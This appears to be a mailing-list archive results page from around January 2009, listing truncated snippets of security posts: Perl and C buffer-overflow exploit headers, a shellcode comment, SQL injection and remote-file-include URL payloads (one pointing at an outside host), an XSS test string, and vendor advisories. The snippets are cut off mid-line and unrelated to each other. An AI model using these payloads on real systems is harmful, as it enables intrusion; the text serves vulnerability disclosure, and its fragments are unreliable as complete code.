Hi,
There's a trick which may permit the bypassing of policies in
technologies which do syscall filtering on the Linux x86_64 kernel.
The trick is made possible by the fact that the 32-bit and 64-bit
kernel tables are different, combined with the fact that a 64-bit
process can make a 32-bit sysca
/* VUplayer (.wax file) local buffer overflow crash exploit
* By Assad edin - Moroccan Hackerz ( Mgharba Until Death ) -
storms0...@hotmail.com
* Mgharba Bhjawa Msalmine : xCracker - Assad edin - Simo-s0ft .
* Special Thanks: All Moroccan & Muslims Hackers & Str0ke Ro7 T9Awd
#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#can get the software from
http://www.download.com/MediaMonkey-Standard/3000-2141_4-10109807.html
my $file = "alpix.m3u" ;
print "[+] Exploiting." ;
my $buff1="http://"."A"; x 543339 ;
open(m3u, ">>$file") or die "Cannot open $file";
print
#include
#include
#include
/* Browser3D local BOF exploit
* coded by SimO-s0fT ( maroc-anti-connex...@hotmail.com)
*greetz to: all friends & all morroccan hackers
*special tnx for str0ke
/* win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
http://metasploit.com */
unsigned char s
[HACKATTACK Advisory 25012009]ConPresso CMS 4.07 - Session Fixation, XFS, XSS
Details
Product: ConPresso CMS 4.07
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.conpresso.de/
Vendor-Status: informed
Advisory-Status: not yet published
Credits
*
Product : Lootan System
vendor : www.kedor.cn
vulnerable versions : RC1 & prior
example :
http://example/ly/login.asp?username=[SQL Command]
Security Advisory
MSL-2008-001 - SonyEricsson WAP Push Denial of Service
Advisory Information
Title:
SonyEricsson WAP Push Denial of Service
Advisory ID:
MSL-2008-001
Advisory URL:
http://www.mseclab.com/index.php?page_id=123
Published:
2009
#!/usr/local/bin/perl
#
# Application: Nokia Multimedia Player
# Version: v 1.1
# Bug: Local (.AVI File) Null Dereference Pointer Exploit
# Exploit Method : Local
# Author : Null Area Security
# Zigma [zigmatn @ gmail.com]
# IRC: irc://ir
Product : LDF
vendor : www.ldf.22.cn
LDF Sql injection vulnerability (in login.asp page) =>
example :
http://example/[ldf path]/login.asp?user=[SQL COMMAND]
Even after DSA-1709, /bin/login in Debian is vulnerable to a local DoS
attack; the attacker does not need special privileges to succeed. For
details please see
http://www.debian.org/security/2009/dsa-1709
http://bugs.debian.org/505271
http://bugs.debian.org/505071
I do not know what pract
: ZDI-09-007: Apple QuickTime Cinepak Codec MDAT Heap Corruption
: Vulnerability
: http://www.zerodayinitiative.com/advisories/ZDI-09-007
: January 21, 2009
:
: -- CVE ID:
: CVE-2009-2006
CVE-2009-0006 perhaps?
CVE-2009-0006 is the correct CVE identifier and it is mentioned at Apple
advisory
http://support.apple.com/kb/HT3403
too.
Juha-Matti
security curmudgeon [jeri...@attrition.org] kirjoitti:
: ZDI-09-007: Apple QuickTime Cinepak Codec MDAT Heap Corruption
: Vulnerability
: http://www.zerodayi
On Fri, 15 Aug 2008, r3d.w...@yahoo.com wrote:
(pardon the late reply)
: #!user/bin/python
: # -*- coding: cp1256 -*-
:
#
: munky-bliki Lfi
#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
system("color 5");
if (@ARGV != 1) { &help; exit(); }
sub help(){
print "[X] Usage : ./exploit.pl filename \n";
}
{ $file = $ARGV[0]; }
print "\n [X]*\n";
print " [X]Browser3D(.sfs file
Benchmarking attacks and major security weakness on all recent Windows versions
up to Windows 2008
--
#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#EAX
#ECX 41414141
#EDX 775A104D
#EBX
#ESP 0012C280
#EBP 0012C2A0
#ESI
#EDI
#EIP 41414141
system("color 5");
if (@ARGV != 1) { &help; exit(); }
sub help(){
print "[X] Usage : ./exploit.pl filename \n
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDVSA-2009:027
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA-1710-1 secur...@debian.org
http://www.debian.org/security/ Steffen Joeris
January 25, 2009
Title: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities
CA Advisory Reference: CA20090123-01
CA Advisory Date: 2009-01-23
Reported By: n/a
Impact: A remote attacker can execute arbitrary commands.
Summary: Multiple security risks exist in Apache Tomcat as
included with CA Cohesion
Can you be more specific? I tested this vulnerability on Oblog v4.5 with the
following XSS string:
alert("xss")
Both the angle brackets and quotes were filtered, so I don't believe that this
version is vulnerable to the problem you describe.
Can you tell us what version you tested?
Hello
WB News v2.0.X Remote File include ..
tested on 2.0.1
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : secur...@soqor.net
search.php?config[installdir]=http://www.soqor.net/index/?
archive.php?config[installdir]=http://www.so
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA-1711-1 secur...@debian.org
http://www.debian.org/security/ Nico Golde
January 26, 2009
===
Ubuntu Security Notice USN-710-1 January 26, 2009
xine-lib vulnerabilities
CVE-2008-3231, CVE-2008-5233, CVE-2008-5234, CVE-2008-5236,
CVE-2008-5237, CVE-2008-5238, CVE-2008-5239, CVE-2008-5240,
CVE-2008-5241, CVE-2008-5242, CVE-
===
Ubuntu Security Notice USN-711-1 January 26, 2009
ktorrent vulnerabilities
CVE-2008-5905, CVE-2008-5906
===
A security issue affects the following Ubuntu releases:
Ubuntu
24 matches
Mail list logo